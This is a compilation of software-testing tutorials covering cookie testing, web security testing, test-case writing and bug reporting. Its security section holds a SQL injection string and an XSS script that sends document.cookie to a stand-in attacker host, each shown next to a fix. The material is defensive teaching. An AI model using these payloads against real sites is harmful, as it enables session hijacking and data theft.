HTML page (generally a call to a script language such as JavaScript, PHP or Perl) writes a
text file, called a cookie, on the user’s machine.
Here is the general format of the Set-Cookie header that is used to write a cookie:
Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME;

When the user visits the same page or domain at a later time, this cookie is read from disk
and used to identify the repeat visit of the same user on that domain. The expiration time is
set while writing the cookie, and is decided by the application that is going to use it.
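For illustration, the Set-Cookie format above can be parsed with Python's standard http.cookies module; the cookie name and values here are made up (modeled on the rediff.com example discussed later in this article):

```python
from http.cookies import SimpleCookie

# A Set-Cookie style header string with illustrative values.
raw = "RMID=1d11c8ec44bf49e0; path=/; domain=.rediff.com"

cookie = SimpleCookie()
cookie.load(raw)            # parse NAME=VALUE plus its attributes

morsel = cookie["RMID"]     # one cookie ("morsel") by name
print(morsel.value)         # -> 1d11c8ec44bf49e0
print(morsel["path"])       # -> /
print(morsel["domain"])     # -> .rediff.com
```

This is handy during cookie testing when you want to inspect or assert on the exact attributes a server sends, rather than eyeballing them in browser options.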

Generally two types of cookies are written on user machine.

1) Session cookies: This cookie is active as long as the browser that created it is open.
When we close the browser, the session cookie is deleted. Sometimes a session timeout of,
say, 20 minutes is set to expire the cookie.
2) Persistent cookies: Cookies that are written permanently to the user’s machine and
last for months or years.
Where are cookies stored?
When a web application writes a cookie, it is saved in a text file on the user’s hard disk
drive. The path where cookies are stored depends on the browser; different browsers store
cookies in different paths. E.g. Internet Explorer stores cookies at the
path “C:\Documents and Settings\Default User\Cookies”
Here “Default User” is replaced by the user you are currently logged in as, like
“Administrator”, or a user name like “Vijay”, etc.
The cookie path can easily be found by navigating through the browser options. In the
Mozilla Firefox browser you can even view the cookies in the browser options themselves:
open the browser and click Tools->Options->Privacy, then the “Show cookies” button.
How are cookies stored?
Let’s take the example of a cookie written by rediff.com in the Mozilla Firefox browser:
When you open the page rediff.com or log in to your rediffmail account in Firefox, a cookie
is written to your hard disk. To view this cookie, simply click the “Show cookies” button
mentioned above, then click the Rediff.com site in the cookie list. You can see the different
cookies written by the rediff domain under different names.
Site: Rediff.com Cookie name: RMID
Name: RMID (Name of the cookie)
Content: 1d11c8ec44bf49e0… (Encrypted content)
Domain: .rediff.com
Path: / (Any path after the domain name)
Send For: Any type of connection
Expires: Thursday, December 31, 2020 11:59:59 PM
Applications where cookies can be used:
1) To implement a shopping cart:
Cookies are used to maintain an online ordering system: they remember what the user
wants to buy. What if the user adds some products to the shopping cart and then, for some
reason, decides not to buy them this time and closes the browser window? The next time
the same user visits the purchase page, he can see all the products he added to the
shopping cart on his last visit.
2) Personalized sites:
When users visit certain pages, they are asked which pages they do or do not want
displayed. The user’s options are stored in a cookie and, while the user is online, those
pages are not shown to him.
3) User tracking:
To track the number of unique visitors online at a particular time.
4) Marketing:
Some companies use cookies to display advertisements on user machines. Cookies control
these advertisements: when and which advertisement should be shown, what the interests
of the user are, which keywords he searches for on the site. All of these things can be
maintained using cookies.
5) User sessions:
Cookies can track user sessions for a particular domain using a user ID and password.
Drawbacks of cookies:
1) Even though writing cookies is a great way to maintain user interaction, if the user has
set browser options to warn before writing any cookie, or has disabled cookies completely,
then a site that depends on cookies will be largely disabled and unable to perform some
operations, resulting in loss of site traffic.
2) Too many Cookies:
If you are writing too many cookies on every page navigation, and the user has turned on
the option to warn before writing cookies, this could turn the user away from your site.
3) Security issues:
Sometimes a user’s personal information is stored in cookies, and if someone hacks the
cookie then the hacker can get access to that personal information. Even corrupted cookies
can be read by different domains and lead to security issues.
4) Sensitive information:
Some sites may write and store your sensitive information in cookies, which should not be
allowed due to privacy concerns.
This should be enough to know what cookies are. If you want more cookie information, see
the Cookie Central page.
Some Major Test cases for web application cookie testing:
The first obvious test case is to test whether your application is writing cookies properly to
disk. You can also use a cookie tester application if you don’t have a web application to test
but want to understand the cookie concept for testing.
Test cases:
1) As a cookie privacy policy, make sure from your design documents that no personal or
sensitive data is stored in a cookie.
2) If you have no option other than saving sensitive data in a cookie, make sure the data
is stored in encrypted format.
3) Make sure there is no overuse of cookies on the site under test. Overuse of cookies will
annoy users if the browser prompts for cookies often, and this could result in loss of site
traffic and eventually loss of business.
4) Disable the cookies from your browser settings: If your site depends on cookies, its
major functionality will not work when cookies are disabled. Try to access the web site
under test and navigate through the site. Check that appropriate messages are displayed to
the user, such as “For smooth functioning of this site, make sure that cookies are enabled in
your browser”. There should not be any page crash due to disabled cookies. (Make sure
that you close all browsers and delete all previously written cookies before performing this
test.)
5) Accept/Reject some cookies: The best way to check web site functionality is not to
accept all cookies. If your web application writes 10 cookies, then randomly accept some,
say accept 5 and reject 5. To execute this test case, set your browser options to prompt
whenever a cookie is being written to disk. On this prompt window you can either accept or
reject each cookie. Then try to access the major functionality of the web site and see
whether pages crash or data gets corrupted.
6) Delete cookies: Allow the site to write its cookies, then close all browsers and manually
delete all cookies for the web site under test. Access the web pages and check the behavior
of the pages.
7) Corrupt the cookies: Corrupting a cookie is easy: you know where cookies are stored.
Manually edit the cookie in Notepad and change its parameters to some vague values, e.g.
alter the cookie content, the name of the cookie or the expiry date, and observe the site
functionality. In some cases a corrupted cookie allows its data to be read by another
domain. This should not happen with your web site’s cookies. Note that cookies written by
one domain, say rediff.com, can’t be accessed by another domain, say yahoo.com, unless
the cookies are corrupted and someone is trying to hack the cookie data.
8) Checking the deletion of cookies from your web application page: Sometimes a
cookie written by a domain, say rediff.com, may be deleted by the same domain but by a
different page under that domain. This is the general case if you are testing an ‘action
tracking’ web portal: an action tracking or purchase tracking pixel is placed on the action
web page, and when any action or purchase by a user occurs, the cookie written to disk is
deleted to avoid multiple action logging from the same cookie. Check that reaching your
action or purchase page deletes the cookie properly and that no more invalid actions or
purchases get logged from the same user.
9) Cookie testing on multiple browsers: This is an important case: check that your web
application page writes cookies properly on different browsers as intended, and that the
site works properly using these cookies. You can test your web application on the major
browsers, such as Internet Explorer (various versions), Mozilla Firefox, Netscape, Opera,
etc.
10) If your web application uses cookies to maintain the login state of a user,
then log in to your web application with some username and password. In many cases you
can see the logged-in user ID parameter directly in the browser address bar. Change this
parameter to a different value, say, if the previous user ID is 100 then make it 101, and
press Enter. A proper access-denied message should be displayed, and the user should not
be able to see another user’s account.
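The server-side behavior implied by test case 10 can be sketched as follows: access must be granted from the session, never from the user ID in the URL alone. The session store, token names and IDs below are all hypothetical:

```python
# Hypothetical session store mapping session tokens to logged-in user IDs.
SESSIONS = {"token-abc": 100}

def can_view_account(session_token, requested_user_id):
    """Server-side check: the URL parameter alone must never grant access."""
    logged_in_id = SESSIONS.get(session_token)
    return logged_in_id is not None and logged_in_id == requested_user_id

# Legitimate request for the user's own account:
print(can_view_account("token-abc", 100))  # -> True
# Tampered URL parameter (userid changed from 100 to 101):
print(can_view_account("token-abc", 101))  # -> False
```

When this check is missing, changing `userid=100` to `userid=101` in the address bar exposes another user's account, which is exactly what the test case above tries to catch.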
These are some major test cases to consider when testing website cookies. You can
derive multiple test cases from these by performing various combinations. If you have a
different application scenario, you can mention your test cases in the comments below.

An approach for Security Testing of Web Applications
Introduction
As more and more vital data is stored in web applications and the number of transactions on
the web increases, proper security testing of web applications is becoming very important.
Security testing is the process that determines that confidential data stays
confidential (i.e. it is not exposed to individuals/ entities for which it is not meant) and
users can perform only those tasks that they are authorized to perform (e.g. a user should
not be able to deny the functionality of the web site to other users, a user should not be
able to change the functionality of the web application in an unintended way etc.).
Some key terms used in security testing
Before we go further, it will be useful to be aware of a few terms that are frequently used in
web application security testing:

What is “Vulnerability”?
This is a weakness in the web application. The cause of such a “weakness” can be bugs in
the application, an injection (SQL/script code) or the presence of viruses.

What is “URL manipulation”?
Some web applications communicate additional information between the client (browser)
and the server in the URL. Changing some information in the URL may sometimes lead to
unintended behavior by the server.
What is “SQL injection”?
This is the process of inserting SQL statements through the web application user interface
into some query that is then executed by the server.
What is “XSS (Cross Site Scripting)”?
When a user inserts HTML/ client-side script in the user interface of a web application and
this insertion is visible to other users, it is called XSS.
What is “Spoofing”?
The creation of hoax look-alike websites or emails is called spoofing.
Security testing approach:
In order to perform a useful security test of a web application, the security tester should
have good knowledge of the HTTP protocol. It is important to have an understanding of how
the client (browser) and the server communicate using HTTP. Additionally, the tester should
at least know the basics of SQL injection and XSS. Hopefully, the number of security defects
present in the web application will not be high. However, being able to accurately describe
the security defects with all the required details to all concerned will definitely help.

1. Password cracking:
The security testing of a web application can be kicked off by “password cracking”. In order
to log in to the private areas of the application, one can either guess a username/password
or use a password cracker tool. Lists of common usernames and passwords are available,
along with open source password crackers. If the web application does not enforce a
complex password (e.g. with letters, numbers and special characters, and at least a
required number of characters), it may not take very long to crack the username and
password.
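As a sketch of the kind of complexity policy mentioned above (the exact rules here are an assumption; real policies vary), a server-side check might look like:

```python
import re

def is_complex(password, min_len=8):
    """Hypothetical policy: minimum length plus letters, digits and specials."""
    return (len(password) >= min_len
            and re.search(r"[A-Za-z]", password) is not None   # at least one letter
            and re.search(r"\d", password) is not None          # at least one digit
            and re.search(r"[^A-Za-z0-9]", password) is not None)  # one special char

print(is_complex("password"))     # -> False (no digit or special character)
print(is_complex("S3cure!pass"))  # -> True
```

A tester can run a dictionary of common passwords through such a check: any weak password the application accepted but the policy rejects is a finding.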

If the username or password is stored in cookies without encryption, an attacker can use
various methods to steal the cookies and then the information stored in them, such as the
username and password.

For more details see article on “Website cookie testing”.


2. URL manipulation through HTTP GET methods:
The tester should check if the application passes important information in the querystring.
This happens when the application uses the HTTP GET method to pass information between
the client and the server. The information is passed in parameters in the querystring. The
tester can modify a parameter value in the querystring to check if the server accepts it.

Via an HTTP GET request, user information is passed to the server for authentication or for
fetching data. An attacker can manipulate every input variable passed in this GET request
in order to get the required information or to corrupt the data. In such conditions, any
unusual behavior by the application or web server is a doorway for the attacker to get into
the application.
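A tester can script this kind of parameter tampering instead of editing the address bar by hand. Here is a small sketch using Python's urllib.parse; the URL and parameter names are illustrative:

```python
from urllib.parse import urlsplit, parse_qs, urlencode, urlunsplit

def tamper_param(url, name, new_value):
    """Return the URL with one querystring parameter replaced (for testing)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)       # e.g. {'userid': ['100'], 'query': ['xyz']}
    query[name] = [new_value]           # overwrite the targeted parameter
    return urlunsplit(parts._replace(query=urlencode(query, doseq=True)))

original = "http://www.examplesite.com/index.php?userid=100&query=xyz"
print(tamper_param(original, "userid", "101"))
# -> http://www.examplesite.com/index.php?userid=101&query=xyz
```

Each tampered URL is then requested, and the server's response is checked: it should reject or ignore the manipulated value, never expose data belonging to another user.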

3. SQL Injection:
The next thing that should be checked is SQL injection. Entering a single quote (‘) in any
textbox should be rejected by the application. Instead, if the tester encounters a database
error, it means that the user input is inserted in some query which is then executed by the
application. In such a case, the application is vulnerable to SQL injection.

SQL injection attacks are very critical, as an attacker can get vital information from the
server database. To check the SQL injection entry points into your web application, find the
code in your code base where direct MySQL queries are executed against the database
using user inputs.

If user input data is placed into SQL queries that are run against the database, an attacker
can inject SQL statements, or parts of SQL statements, as user input to extract vital
information from the database. Even if the attacker only succeeds in crashing the
application, the SQL query error shown in the browser may reveal the information the
attacker is looking for. Special characters in user input should be handled/escaped properly
in such cases.
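The standard defense is to pass user input as bound parameters rather than concatenating it into the query text. The following sketch, using an in-memory SQLite database with an invented table and data, shows both the vulnerable and the safe pattern:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

malicious = "x' OR '1'='1"  # classic injection payload

# Vulnerable: user input concatenated straight into the query text.
vulnerable = "SELECT secret FROM users WHERE name = '%s'" % malicious
print(conn.execute(vulnerable).fetchall())          # -> [('s3cret',)]  data leaked

# Safe: the driver binds the input as a parameter, never as SQL.
safe = "SELECT secret FROM users WHERE name = ?"
print(conn.execute(safe, (malicious,)).fetchall())  # -> []  no match, no leak
```

The injected `' OR '1'='1` turns the vulnerable query's WHERE clause into a condition that is always true, returning every row; the parameterized version simply looks for a user literally named `x' OR '1'='1` and finds none.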

4. Cross Site Scripting (XSS):
The tester should additionally check the web application for XSS (Cross Site Scripting). No
HTML (e.g. <HTML>) or script (e.g. <SCRIPT>) should be accepted by the application. If it
is, the application can be prone to an attack by Cross Site Scripting.

An attacker can use this method to execute a malicious script or URL in the victim’s
browser. Using cross-site scripting, an attacker can use scripts such as JavaScript to steal
user cookies and the information stored in them.

Many web applications collect some user information and pass it in variables between
different pages.

E.g.: http://www.examplesite.com/index.php?userid=123&query=xyz

An attacker can easily pass malicious input or a <script> as the ‘&query’ parameter, which
can expose important user/server data in the browser.
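On the server side, the usual defense is to escape user input before reflecting it into a page. A minimal Python sketch follows; the payload and page fragment are invented:

```python
from html import escape

# A typical cookie-stealing XSS payload (hypothetical attacker domain).
user_input = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

# Reflected unescaped: the browser would execute the script.
unsafe_html = "<p>You searched for: %s</p>" % user_input

# Escaped before rendering: the payload is shown as inert text.
safe_html = "<p>You searched for: %s</p>" % escape(user_input)
print(safe_html)
```

The tester's job is to find pages behaving like `unsafe_html`: if a `<script>` submitted in a form or URL parameter comes back executable rather than escaped, the application is vulnerable.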

Important: During security testing, the tester should be very careful not to modify any of
the following:
• Configuration of the application or the server
• Services running on the server
• Existing user or customer data hosted by the application
Additionally, a security test should be avoided on a production system.

The purpose of the security test is to discover the vulnerabilities of the web application so
that the developers can then remove these vulnerabilities from the application and make
the web application and data safe from unauthorized actions.

Web Testing, Example Test cases

While testing a web application you need to consider the following cases:

• Functionality Testing
• Performance Testing
• Usability Testing
• Server Side Interface
• Client Side Compatibility
• Security
Functionality:
In testing the functionality of the web sites the following should be tested:
• Links
i. Internal Links
ii. External Links
iii. Mail Links
iv. Broken Links
• Forms
i. Field validation
ii. Error message for wrong input
iii. Optional and Mandatory fields
• Database
* Testing will be done on the database integrity.
• Cookies
* Testing will be done on the client system side, on the temporary Internet files.
Performance:
Performance testing can be applied to understand the web site’s scalability, or to benchmark
its performance in the environment of third-party products, such as servers and middleware
being considered for purchase.
• Connection Speed:
Tested over various networks like dial-up, ISDN, etc.
• Load:
i. What is the number of users per unit time?
ii. Check for peak loads and how the system behaves
iii. Large amounts of data accessed by users
• Stress:
i. Continuous load
ii. Performance of memory, CPU, file handling, etc.
Usability:
Usability testing is the process by which the human-computer interaction characteristics of a
system are measured, and weaknesses are identified for correction.
• Ease of learning
• Navigation
• Subjective user satisfaction
• General appearance
Server Side Interface:
In web testing the server side interface should be tested. This is done by verifying that
communication happens properly. Compatibility of the server with software, hardware,
network and database should be tested.
Client Side Compatibility:
Client side compatibility is also tested on various platforms, using various browsers, etc.
Security:
The primary reason for testing the security of a web site is to identify potential
vulnerabilities and subsequently repair them.
• Network Scanning
• Vulnerability Scanning
• Password Cracking
• Log Review
• Integrity Checkers
• Virus Detection

How to write effective Test cases, procedures and definitions

Writing effective test cases is a skill, and it can be achieved through experience and in-
depth study of the application for which the test cases are being written.
Here I will share some tips on how to write test cases, test case procedures and
some basic test case definitions.
What is a test case?
“A test case has components that describe an input, action or event and an expected
response, to determine if a feature of an application is working correctly.” Definition
by Glossary
There are levels into which each test case will fall in order to avoid duplication of effort.
Level 1: In this level you will write the basic test cases from the available
specification and user documentation.
Level 2: This is the practical stage, in which writing test cases depends on the actual
functional and system flow of the application.
Level 3: This is the stage in which you will group some test cases and write a test
procedure. Test procedure is nothing but a group of small test cases maximum of 10.
Level 4: Automation of the project. This will minimize human interaction with the system,
so QA can focus on currently updated functionality to test rather than remaining busy with
regression testing.
So you can observe a systematic growth from no testable items to an automation suite.

Why we write test cases?


The basic objective of writing test cases is to validate the testing coverage of the
application. If you are working in a CMMi company then you will strictly follow test case
standards, so writing test cases brings some standardization and minimizes the ad-hoc
approach in testing.
How to write test cases?
Here is a simple test case format
Fields in test cases:
Test case id:
Unit to test: What to be verified?
Assumptions:
Test data: Variables and their values
Steps to be executed:
Expected result:
Actual result:
Pass/Fail:
Comments:
So here is a basic format of test case statement:

Verify
Using [tool name, tag name, dialog, etc]
With [conditions]
To [what is returned, shown, demonstrated]
Verify: Used as the first word of the test case statement.
Using: To identify what is being tested. You can use ‘entering’ or ‘selecting’ here instead
of ‘using’, depending on the situation.
For any application basically you will cover all the types of test cases including
functional, negative and boundary value test cases.
Keep in mind while writing test cases that all your test cases should be simple and easy
to understand. Don’t write explanations like essays; be to the point.
Try writing simple test cases as in the above test case format.
Generally I use Excel sheets to write the basic test cases. Use a tool like ‘Test
Director’ when you are going to automate those test cases.
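The test case fields listed above can be sketched as a simple record, for example as a Python dataclass; the field names follow the format above and the example data is invented:

```python
from dataclasses import dataclass, field

@dataclass
class TestCase:
    """One row of the Excel-sheet style format described above."""
    test_case_id: str
    unit_to_test: str           # what is to be verified
    steps: list                 # steps to be executed
    expected_result: str
    test_data: dict = field(default_factory=dict)  # variables and their values
    assumptions: str = ""
    actual_result: str = ""     # filled in at execution time
    status: str = ""            # Pass/Fail, filled in at execution time
    comments: str = ""

tc = TestCase(
    test_case_id="TC-001",
    unit_to_test="Login page - valid credentials",
    steps=["Open the login page",
           "Enter a valid username and password",
           "Click Login"],
    expected_result="User lands on the home page",
    test_data={"username": "vijay", "password": "S3cure!pass"},
)
print(tc.test_case_id, "-", tc.unit_to_test)
```

Keeping the format this regular is what makes Level 4 (automation) practical: each record can be fed to a test runner and its `actual_result` and `status` filled in mechanically.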

How to write a good bug report? Tips and Tricks


Why a good Bug report?
If your bug report is effective, chances are higher that it will get fixed. So fixing a bug
depends on how effectively you report it. Reporting a bug is a skill, and I will tell you how
to achieve it.
“The point of writing a problem report (bug report) is to get bugs fixed” – Cem
Kaner. If a tester does not report a bug correctly, the programmer will most likely reject it
as irreproducible. This can hurt the tester’s morale and sometimes ego too. (I suggest not
keeping any kind of ego, such as “I have reported the bug correctly”, “I can reproduce it”,
“Why has he/she rejected the bug?”, “It’s not my fault”, etc.)
What are the qualities of a good software bug report?
Anyone can write a bug report, but not everyone can write an effective bug report. You
should be able to distinguish between an average bug report and a good one. How do you
distinguish a good bug report from a bad one? It’s simple: apply the following
characteristics and techniques when reporting a bug.
1) Having clearly specified bug number:
Always assign a unique number to each bug report. This will help to identify the bug record.
If you are using any automated bug-reporting tool then this unique number will be
generated automatically each time you report the bug. Note the number and brief
description of each bug you reported.
2) Reproducible:
If your bug is not reproducible it will never get fixed. You should clearly mention the steps
to reproduce the bug. Do not assume or skip any reproduction step. A bug described step
by step is easy to reproduce and fix.
3) Be Specific:
Do not write an essay about the problem. Be specific and to the point. Try to summarize
the problem in a minimum of words yet in an effective way. Do not combine multiple
problems even if they seem similar; write a separate report for each problem.
How to Report a Bug?
Use following simple Bug report template:
This is a simple bug report format. It may vary depending on the bug report tool you are
using. If you are writing the bug report manually then some fields, like the bug number,
need to be mentioned and assigned manually.
Reporter: Your name and email address.
Product: In which product you found this bug.
Version: The product version if any.
Component: These are the major sub modules of the product.
Platform: Mention the hardware platform where you found this bug. The various platforms
like ‘PC’, ‘MAC’, ‘HP’, ‘Sun’ etc.
Operating system: Mention all operating systems where you found the bug. Operating
systems like Windows, Linux, Unix, SunOS, Mac OS. Mention the different OS versions also
if applicable like Windows NT, Windows 2000, Windows XP etc.
Priority:
When should the bug be fixed? Priority is generally set from P1 to P5, with P1 meaning “fix
the bug with highest priority” and P5 meaning “fix when time permits”.
Severity:
This describes the impact of the bug.
Types of Severity:
• Blocker: No further testing work can be done.
• Critical: Application crash, Loss of data.
• Major: Major loss of function.
• Minor: minor loss of function.
• Trivial: Some UI enhancements.
• Enhancement: Request for new feature or some enhancement in existing one.
Status:
When you are logging the bug in any bug tracking system then by default the bug status is
‘New’.
Later on the bug goes through various stages like Fixed, Verified, Reopen, Won’t Fix, etc.
Assign To:
If you know which developer is responsible for the particular module in which the bug
occurred, then you can specify that developer’s email address. Otherwise keep it blank; the
bug will be assigned to the module owner, or the manager will assign it to a developer.
Possibly add the manager’s email address to the CC list.
URL:
The page URL on which the bug occurred.
Summary:
A brief summary of the bug, ideally in 60 words or fewer. Make sure your summary reflects
what the problem is and where it is.
Description:
A detailed description of the bug. Use the following fields in the description:
• Reproduce steps: Clearly mention the steps to reproduce the bug.
• Expected result: How application should behave on above mentioned steps.
• Actual result: What is the actual result on running above steps i.e. the bug
behavior.
These are the important steps in bug report. You can also add the “Report type” as one
more field which will describe the bug type.

The report types are typically:


1) Coding error
2) Design error
3) New suggestion
4) Documentation issue
5) Hardware problem
Some Bonus tips to write a good bug report:
1) Report the problem immediately: If you find a bug while testing, do not wait to
write a detailed bug report later. Write the bug report immediately; this will ensure a
good and reproducible bug report. If you decide to write the bug report later, chances are
high that you will miss important steps in your report.
2) Reproduce the bug three times before writing the bug report: Your bug should be
reproducible. Make sure your steps are robust enough to reproduce the bug without any
ambiguity. If your bug is not reproducible every time, you can still file it, mentioning the
periodic nature of the bug.
3) Test the same bug occurrence in other similar modules:
Sometimes developers use the same code for different similar modules, so chances are
high that a bug in one module will occur in other similar modules as well. You can even try
to find a more severe version of the bug you found.
4) Write a good bug summary:
The bug summary helps developers to quickly analyze the nature of the bug. A poor quality
report will unnecessarily increase development and testing time. Communicate well through
your bug report summary; keep in mind that the summary is used as a reference when
searching for the bug in the bug inventory.
5) Read the bug report before hitting the Submit button:
Read all the sentences, wording and steps used in the bug report. See if any sentence
creates ambiguity that could lead to misinterpretation. Misleading words or sentences
should be avoided in order to have a clear bug report.
6) Do not use abusive language:
It’s nice that you did good work and found a bug, but do not use this credit to criticize the
developer or to attack any individual.
Conclusion:
No doubt your bug report should be a high quality document. Focus on writing good bug
reports and spend some time on this task, because this is the main communication point
between tester, developer and manager. Managers should make their teams aware that
writing a good bug report is a primary responsibility of any tester. Your efforts toward
writing good bug reports will not only save company resources but also create a good
relationship between you and the developers.
Sample bug report
This is a guest post from Vijay D (a coincidence with my name).
The sample bug/defect report below will give you an exact idea of how to report a bug in a
bug tracking tool.
Here is the example scenario that caused a bug:
Let’s assume that in your application under test you want to create a new user with user
information. For that you need to log on to the application and navigate to the USERS menu
> New User, then enter all the details in the ‘User form’: First Name, Last Name, Age,
Address, Phone, etc. Once you enter all this information, you click the ‘SAVE’ button in
order to save the user, and you should see a success message saying “New User has been
created successfully”.

But when you logged in to the application, navigated to USERS menu > New User, entered
all the required information to create the new user and clicked the SAVE button, BANG! The
application crashed and you got an error page on screen. (Capture this error message
window and save it as a Microsoft Paint file.)

Now this is the bug scenario and you would like to report this as a BUG in your bug-
tracking tool.
How will you report this bug effectively?
Here is the sample bug report for above mentioned example:
(Note that some ‘bug report’ fields might differ depending on your bug tracking system)
SAMPLE BUG REPORT:
Bug Name: Application crash on clicking the SAVE button while creating a new user.
Bug ID: (It will be automatically created by the BUG Tracking tool once you save this bug)
Area Path: USERS menu > New Users
Build Number: Version Number 5.0.1
Severity: HIGH (High/Medium/Low) or 1
Priority: HIGH (High/Medium/Low) or 1
Assigned to: Developer-X
Reported By: Your Name
Reported On: Date
Reason: Defect
Status: New/Open/Active (Depends on the Tool you are using)
Environment: Windows 2003/SQL Server 2005
Description:
The application crashes on clicking the SAVE button while creating a new user; hence it is not possible to create a new user in the application.
Steps To Reproduce:
1) Log on to the application.
2) Navigate to the USERS menu > New User.
3) Fill in all the user information fields.
4) Click the 'Save' button.
5) Observe the error page "ORA1090 Exception: Insert values Error…".
6) See the attached logs for more information (attach any logs related to the bug, if available).
7) Also see the attached screenshot of the error page.
Expected result: On clicking the SAVE button, a success message "New User has been created successfully" should be displayed.
(Attach the 'application crash' screenshot, if available.)

Save the defect/bug in the bug tracking tool. You will get a bug ID, which you can use for further bug reference.
A default 'New bug' mail will go to the respective developer and the default module owner (team leader or manager) for further action.
Related: If you need more information about writing a good bug report, read our previous post "How to write a good bug report".
How to write a good bug report? Tips and Tricks
September 18th, 2007 — Bug Defect tracking, How to be a good tester, Software Testing Templates

Why write a good bug report?
If your bug report is effective, the chances are higher that it will get fixed. So fixing a bug depends on how effectively you report it. Reporting a bug is a skill, and I will tell you how to achieve it.
"The point of writing a problem report (bug report) is to get bugs fixed" – Cem Kaner. If a tester does not report a bug correctly, the programmer will most likely reject it as irreproducible. This can hurt the tester's morale, and sometimes ego too. (I suggest not keeping any kind of ego, such as "I have reported the bug correctly", "I can reproduce it", "Why has he/she rejected the bug?", "It's not my fault", etc.)
What are the qualities of a good software bug report?
Anyone can write a bug report, but not everyone can write an effective one. You should be able to distinguish between an average bug report and a good one. How do you distinguish a good bug report from a bad one? It's simple: apply the following characteristics and techniques when reporting a bug.
1) Having a clearly specified bug number:
Always assign a unique number to each bug report. This will help identify the bug record. If you are using an automated bug-reporting tool, this unique number will be generated automatically each time you report a bug. Note the number and a brief description of each bug you report.
2) Reproducible:
If your bug is not reproducible, it will never get fixed. You should clearly mention the steps to reproduce the bug. Do not assume or skip any reproduction step. A bug described step by step is easy to reproduce and fix.
3) Be Specific:
Do not write an essay about the problem. Be specific and to the point. Try to summarize the problem in as few words as possible, yet effectively. Do not combine multiple problems even if they seem similar; write a separate report for each problem.
How to Report a Bug?
Use the following simple bug report template:
This is a simple bug report format. It may vary depending on the bug reporting tool you are using. If you are writing a bug report manually, then some fields, like the bug number, need to be specified manually.
Reporter: Your name and email address.
Product: The product in which you found this bug.
Version: The product version, if any.
Component: The major sub-module of the product.
Platform: Mention the hardware platform on which you found this bug, e.g. 'PC', 'Mac', 'HP', 'Sun'.
Operating system: Mention all operating systems on which you found the bug: Windows, Linux, Unix, SunOS, Mac OS. Mention different OS versions as well if applicable, like Windows NT, Windows 2000, Windows XP, etc.
Priority:
When should the bug be fixed? Priority is generally set from P1 to P5, with P1 meaning "fix the bug with highest priority" and P5 meaning "fix when time permits".
Severity:
This describes the impact of the bug.
Types of Severity:
• Blocker: No further testing work can be done.
• Critical: Application crash, Loss of data.
• Major: Major loss of function.
• Minor: Minor loss of function.
• Trivial: Some UI enhancements.
• Enhancement: Request for new feature or some enhancement in existing one.
Status:
When you log the bug in a bug tracking system, its status is 'New' by default.
Later the bug goes through various stages like Fixed, Verified, Reopened, Won't Fix, etc. (The detailed bug life cycle is covered in the 'Bug life cycle' article below.)
Assign To:
If you know which developer is responsible for the particular module in which the bug occurred, you can specify that developer's email address. Otherwise keep it blank; this will assign the bug to the module owner, or the manager will assign it to a developer. Possibly add the manager's email address to the CC list.
URL:
The page URL on which the bug occurred.
Summary:
A brief summary of the bug, ideally in 60 words or fewer. Make sure your summary reflects what the problem is and where it is.
Description:
A detailed description of the bug. Use the following fields in the description:
• Reproduce steps: Clearly mention the steps to reproduce the bug.
• Expected result: How the application should behave for the above-mentioned steps.
• Actual result: The actual result of running the above steps, i.e. the bug behavior.
These are the important parts of a bug report. You can also add a "Report type" field to describe the type of the bug.
The report types are typically:
1) Coding error
2) Design error
3) New suggestion
4) Documentation issue
5) Hardware problem
Some bonus tips to write a good bug report:
1) Report the problem immediately: If you find a bug while testing, do not wait to write a detailed bug report later. Write the bug report immediately instead. This will ensure a good and reproducible bug report. If you decide to write the report later, chances are high that you will miss important steps.
2) Reproduce the bug three times before writing the bug report: Your bug should be reproducible. Make sure your steps are robust enough to reproduce the bug without any ambiguity. If your bug is not reproducible every time, you can still file it, mentioning the periodic nature of the bug.
3) Test the same bug occurrence on other similar modules:
Sometimes developers use the same code for different similar modules, so chances are high that a bug in one module also occurs in other similar modules. You can even try to find a more severe version of the bug you found.
4) Write a good bug summary:
The bug summary will help developers quickly analyze the nature of the bug. A poor quality report unnecessarily increases development and testing time. Communicate well through your bug report summary. Keep in mind that the bug summary is used as a reference when searching for the bug in the bug inventory.
5) Read the bug report before hitting the Submit button:
Read all the sentences, wording, and steps used in the bug report. See if any sentence creates ambiguity that could lead to misinterpretation. Misleading words or sentences should be avoided in order to have a clear bug report.
6) Do not use abusive language:
It's nice that you did good work and found a bug, but do not use this credit to criticize the developer or to attack any individual.
Conclusion:
There is no doubt that your bug report should be a high quality document. Focus on writing good bug reports and spend some time on this task, because the bug report is the main communication point between tester, developer, and manager. Managers should make their teams aware that writing a good bug report is a primary responsibility of any tester. Your efforts towards writing good bug reports will not only save company resources but also build a good relationship between you and the developers.
Bug life cycle
What is a Bug/Defect?
A simple Wikipedia definition of a bug is: "A computer bug is an error, flaw, mistake, failure, or fault in a computer program that prevents it from working correctly or produces an incorrect result. Bugs arise from mistakes and errors, made by people, in either a program's source code or its design."
Other definitions can be:
An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction.
or
A fault in a program which causes the program to perform in an unintended or unanticipated manner.
Lastly, the general definition of a bug is: "failure to conform to specifications".
If you want to detect and resolve defects at an early development stage, defect tracking should start simultaneously with the software development phases.

We will discuss writing effective bug reports in another article. Let's concentrate here on the bug/defect life cycle.
Life cycle of a Bug:
1) Log new defect
When a tester logs a new bug, the mandatory fields are:
Build version, Submit On, Product, Module, Severity, Synopsis, and Description to Reproduce.
To the above list you can add some optional fields if you are using a manual bug submission template.
These optional fields are: Customer name, Browser, Operating system, File attachments or screenshots.
The following fields remain either specified or blank:
If you have the authority to set the bug Status, Priority, and 'Assigned to' fields, you can specify them. Otherwise the test manager will set the status and bug priority and assign the bug to the respective module owner.
Look at the following bug life cycle:
[Click on the image to view full size] Ref: Bugzilla bug life cycle

The figure is quite complicated, but when you consider the significant steps in the bug life cycle, you will quickly get an idea of it.
Once the bug is logged successfully, it is reviewed by the development or test manager. The test manager can set the bug status to Open, assign the bug to a developer, or defer the bug until the next release.

When the bug is assigned to a developer, he or she can start working on it. The developer can set the bug status to Won't fix, Couldn't reproduce, Need more information, or Fixed.

If the bug status set by the developer is either 'Need more info' or 'Fixed', then QA responds with a specific action. If the bug is fixed, QA verifies it and can set the bug status to Verified closed or Reopen.
Bug status description:
